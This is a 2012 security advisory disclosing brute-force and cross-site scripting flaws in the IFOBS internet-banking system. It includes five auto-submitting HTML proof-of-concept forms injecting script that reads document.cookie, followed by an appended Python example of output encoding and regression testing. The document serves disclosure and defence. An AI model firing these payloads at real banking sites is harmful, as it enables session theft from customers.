BF and XSS vulnerabilities in IFOBS

2012-10-01 00:00:00
vulners.com

Hello 3APA3A!

I want to warn you about Brute Force and Cross-Site Scripting vulnerabilities in the IFOBS system.

IFOBS is an Internet-banking system, which is widespread and in particular is used by a large number of Ukrainian banks.

These are the following 36 vulnerabilities in IFOBS: 2 BF and 34 XSS (in the first advisory there were 38 vulnerabilities).


Affected products:

All versions of IFOBS are vulnerable. The developers have ignored and not fixed these vulnerabilities (all holes from the three advisories).


Details:

Brute Force (WASC-11):

In the login form of the certificates console (http://site/ifobsClient/certmasterlogin.jsp) there is no protection against picking up the password (captcha).

In the forms for checking registration status and editing the registration profile there is no protection against picking up the password (captcha). Both forms are on the page http://site/ifobsClient/regclientmain.jsp (they can also be accessed at the addresses http://site/ifobsClient/regclientmain.jsp?myaction=getloginformForStatus and http://site/ifobsClient/regclientmain.jsp?myaction=getloginformForEdit) and they use the same script.

Cross-Site Scripting (WASC-08):

POST request to the page http://site/ifobsClient/regclientmain.jsp in the parameters: furtherAction, secondName, firstName, thirdName, BirthDay, BirthMonth, BirthYear, address, livePlace, passportSerial, passportNumber, PassportDay, PassportMonth, PassportYear, passportIssueAgency, tempDocSerial, tempDocNumber, DocDay, DocMonth, DocYear, idCodeNumber, CodeRegDay, CodeRegMonth, CodeRegYear, idCodeRegPlace, phone, email, pmcountry, pmnumber, keyword, password, bankAddress, bankContacts, typeclient.

Exploits for the first five vulnerabilities (in parameters furtherAction, secondName, firstName, thirdName, BirthDay):

IFOBS XSS-6.html

<html>
<head>
<title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/ifobsClient/regclientmain.jsp" method="post">
<input type="hidden" name="login" value="111111">
<input type="hidden" name="id" value="1111">
<input type="hidden" name="myaction" value="login">
<input type="hidden" name="furtherAction" value='"><script>alert(document.cookie)</script>'>
</form>
</body>
</html>

IFOBS XSS-7.html

<html>
<head>
<title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/ifobsClient/regclientmain.jsp" method="post">
<input type="hidden" name="secondName" value='"><script>alert(document.cookie)</script>'>
<input type="hidden" name="BirthDay" value="01">
<input type="hidden" name="BirthMonth" value="01">
<input type="hidden" name="BirthYear" value="2012">
<input type="hidden" name="myaction" value="submitform">
<input type="hidden" name="typeclient" value="standart">
</form>
</body>
</html>

IFOBS XSS-8.html

<html>
<head>
<title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/ifobsClient/regclientmain.jsp" method="post">
<input type="hidden" name="firstName" value='"><script>alert(document.cookie)</script>'>
<input type="hidden" name="BirthDay" value="01">
<input type="hidden" name="BirthMonth" value="01">
<input type="hidden" name="BirthYear" value="2012">
<input type="hidden" name="myaction" value="submitform">
<input type="hidden" name="typeclient" value="standart">
</form>
</body>
</html>

IFOBS XSS-9.html

<html>
<head>
<title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/ifobsClient/regclientmain.jsp" method="post">
<input type="hidden" name="thirdName" value='"><script>alert(document.cookie)</script>'>
<input type="hidden" name="BirthDay" value="01">
<input type="hidden" name="BirthMonth" value="01">
<input type="hidden" name="BirthYear" value="2012">
<input type="hidden" name="myaction" value="submitform">
<input type="hidden" name="typeclient" value="standart">
</form>
</body>
</html>

IFOBS XSS-10.html

<html>
<head>
<title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/ifobsClient/regclientmain.jsp" method="post">
<input type="hidden" name="BirthDay" value='</script><script>alert(document.cookie)</script>'>
<input type="hidden" name="BirthMonth" value="01">
<input type="hidden" name="BirthYear" value="2012">
<input type="hidden" name="myaction" value="submitform">
<input type="hidden" name="typeclient" value="standart">
</form>
</body>
</html>


Timeline:

2012.05.04 - found the vulnerabilities during a pentest. After I informed my client, he could inform the developers.
2012.05.29 - announced at my site.
2012.06.01 - informed the developers about vulnerabilities (the first advisory).
2012.06.01 - informed the developers about vulnerabilities (the second advisory).
2012.06.02 - informed the developers about vulnerabilities (the third advisory).
2012.09.18 - disclosed at my site (http://websecurity.com.ua/5859/).

Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
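The PoC forms above show two distinct reflection contexts: most parameters break out of a double-quoted attribute with `">`, while BirthDay breaks out of an inline script block with `</script>`. The following is an added example (not code from the advisory or from IFOBS) showing why each context needs its own encoder; the rendering template, the function names and the assumption that BirthDay is echoed into a JavaScript string are hypothetical.

```python
import html
import json

# Constructed payloads, copied from the advisory's PoC forms.
ATTR_PAYLOAD = '"><script>alert(document.cookie)</script>'
SCRIPT_PAYLOAD = '</script><script>alert(document.cookie)</script>'


def encode_for_attribute(value: str) -> str:
    """Encode a value echoed inside a double-quoted HTML attribute.

    html.escape(quote=True) turns & < > " ' into entities, so a quote in the
    input cannot terminate the attribute and '>' cannot close the tag."""
    return html.escape(value, quote=True)


def encode_for_js_string(value: str) -> str:
    """Encode a value echoed inside an inline <script> block.

    Entity encoding does not help here: the HTML tokenizer does not decode
    entities inside <script>, and the JS parser does not understand them.
    Emit a JSON string literal and additionally escape < and > as \\u003c
    and \\u003e, so a literal "</script>" can never appear in the output."""
    literal = json.dumps(value)
    return literal.replace("<", "\\u003c").replace(">", "\\u003e")


def render_profile_page(second_name: str, birth_day: str, hardened: bool = True) -> str:
    """Hypothetical fragment of a registration page that echoes two POST
    parameters. hardened=False reproduces the raw echo the advisory describes;
    hardened=True applies the encoder matching each context."""
    if hardened:
        second_name = encode_for_attribute(second_name)
        birth_day_js = encode_for_js_string(birth_day)
    else:
        birth_day_js = f'"{birth_day}"'
    return (
        f'<input type="hidden" name="secondName" value="{second_name}">\n'
        f"<script>var birthDay = {birth_day_js};</script>"
    )


def reflects_script(fragment: str) -> bool:
    """Crude regression check: the template itself contains exactly one
    <script> opening tag, so any additional one came from user input."""
    return fragment.count("<script>") > 1


if __name__ == "__main__":
    print(render_profile_page(ATTR_PAYLOAD, SCRIPT_PAYLOAD, hardened=False))
    print(render_profile_page(ATTR_PAYLOAD, SCRIPT_PAYLOAD))
```

The same `reflects_script` style of check, run against a test client posting the advisory's payloads to each listed parameter, makes a cheap regression test once the encoders are in place.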